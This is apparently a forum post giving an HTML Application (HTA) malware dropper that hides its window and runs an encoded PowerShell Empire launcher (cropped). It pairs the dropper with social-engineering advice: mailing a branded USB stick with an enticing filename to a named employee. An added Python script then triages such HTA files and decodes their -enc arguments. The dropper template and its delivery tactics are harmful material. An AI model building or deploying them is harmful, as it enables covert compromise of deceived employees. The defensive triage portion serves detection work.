This is a small example of an HTML Application (HTA) that will execute a PowerShell script when run. Getting an HTA to run in a modern browser might not be that easy, but it runs perfectly when executed directly, and it will not inherit the limitations the browser would put on it. The thought behind this is an HTA script on a USB stick with an enticing filename, maybe amongst other files that look harmless but interesting. The script will give a warning when executed, but this is no different from most Java launchers.
Yes, I am saying you need the user to click it, but it is a lot less offensive than scripts that flash on the screen. Not all victims are that easy anymore, and organizations do spend a lot of money and energy on awareness training. You can still drop a handful of USB sticks in the parking lot outside the target business, but it does cost a bit, requires you to prepare them all, and chances are that users will either hand them over to security staff or bring them home. If this is part of a penetration test, attacking employee home computers is likely out of scope.
One fairly easy way to get an employee to plug in a USB device and actually execute a file is to put just one USB stick in an envelope with the name of the target on it and send it to the user, if possible via internal company mail and in an envelope with the organization logo on it.
Think about it! The employee arrives at his desk and on it is an envelope with the business logo and his name on it. There is a good chance the user will feel perfectly safe plugging it in and investigating the contents.
Needless to say, the filename should be something that looks work-related or at least interesting. Having the business logo on the USB stick itself will also increase the chance of success.
There is no flashy HTML in this script, but it will execute minimized with no indication in the taskbar and will only need a few seconds to execute the launcher or whatever you decide to execute.
Feel free to play around with it and modify or improve it in whatever manner you like.
Code:
<html>
<head>
<title></title>
<HTA:APPLICATION
     ID="oMalHTA"
     APPLICATIONNAME="MalwareLauncher"
     SCROLL="no"
     SINGLEINSTANCE="yes"
     WINDOWSTATE="minimize"
     BORDER="none"
     contextMenu="no"
     CAPTION="no"
     SHOWINTASKBAR="no"
     SYSMENU="no"
     MaximizeButton="no"
     MinimizeButton="no"
>
</head>

<SCRIPT Language="VBScript">
' Launch the encoded PowerShell command through WScript.Shell, then close the HTA window
Dim objShell
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMA...cropped Empire Launcher...AfABJAEUAWAA="
self.close()
</SCRIPT>
<body>
</body>
</html>
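For the defender's side of this, here is an added Python triage script (not part of the original post) that shows what an analyst looks for in a file like the one above: the HTA:APPLICATION attributes that suppress the window's visual cues (WINDOWSTATE, SHOWINTASKBAR, CAPTION, SYSMENU, BORDER), a WScript.Shell object being created, and a `powershell -enc` argument, which it decodes back to readable text because -EncodedCommand takes base64 of the UTF-16LE command. The sample HTA, its harmless encoded command and the scoring threshold are constructed here for the example.

```python
"""Static triage of .hta files for the indicators discussed above.

Added defensive example, not the forum post's code. The sample HTA and its
encoded command are constructed here so the script runs offline."""
import base64
import re

# HTA:APPLICATION attribute values that remove the normal cues of a window.
HIDING_ATTRIBUTES = {
    "windowstate": {"minimize"},
    "showintaskbar": {"no"},
    "caption": {"no"},
    "sysmenu": {"no"},
    "border": {"none"},
}

# powershell invocation followed by -e / -ec / -enc / -encodedcommand and a base64 blob
ENC_RE = re.compile(
    r"powershell(?:\.exe)?[^\"'\r\n]*?-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)
APP_TAG_RE = re.compile(r"<hta:application\b(.*?)>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')
SHELL_RE = re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"', re.IGNORECASE)


def hta_application_attributes(hta_text):
    """Return {name_lower: value} for the first HTA:APPLICATION tag, or {}."""
    m = APP_TAG_RE.search(hta_text)
    if not m:
        return {}
    return {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}


def hiding_attributes(attrs):
    """Sorted names of attributes whose value suppresses the window's visual cues."""
    return sorted(
        name for name, bad in HIDING_ATTRIBUTES.items()
        if attrs.get(name, "").lower() in bad
    )


def decode_encoded_commands(hta_text):
    """Decode every `powershell -enc <base64>` found in the file.

    -EncodedCommand carries base64 of the UTF-16LE command text, so the decode
    is base64 -> bytes -> UTF-16LE. A blob that does not decode (truncated or
    padded oddly) is reported as None so triage of the rest continues."""
    out = []
    for blob in ENC_RE.findall(hta_text):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            out.append(None)
    return out


def triage(hta_text):
    """Summarise the indicators for one .hta file.

    The score weights and the threshold of 3 are an arbitrary choice for this
    example; tune them against your own sample set."""
    attrs = hta_application_attributes(hta_text)
    hidden = hiding_attributes(attrs)
    commands = decode_encoded_commands(hta_text)
    spawns_shell = SHELL_RE.search(hta_text) is not None
    score = len(hidden) + (2 if commands else 0) + (1 if spawns_shell else 0)
    return {
        "hiding_attributes": hidden,
        "decoded_commands": commands,
        "wscript_shell": spawns_shell,
        "suspicious": score >= 3,
    }


# Constructed sample: same window-hiding attributes as the post's HTA, but the
# encoded command only writes a line to the console.
SAMPLE_COMMAND = "Write-Host 'constructed sample, nothing is executed'"
SAMPLE_B64 = base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode("ascii")
SAMPLE_HTA = f"""<html><head><title></title>
<HTA:APPLICATION ID="sample" WINDOWSTATE="minimize" SHOWINTASKBAR="no"
                 CAPTION="no" SYSMENU="no" BORDER="none">
</head>
<SCRIPT Language="VBScript">
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -noP -w 1 -enc {SAMPLE_B64}"
self.close()
</SCRIPT><body></body></html>"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_HTA).items():
        print(f"{key}: {value}")
```

Run against the post's own HTA, the regex captures only the 16 base64 characters visible before the cropped part, `SQBGACgAJABQAFMA`, which decode to `IF($PS`, the opening of the launcher's PowerShell statement; the full command is not on the page, so nothing more can be recovered from it. Decoding the -enc argument is usually the quickest way to see what an HTA found on a USB stick would actually have run.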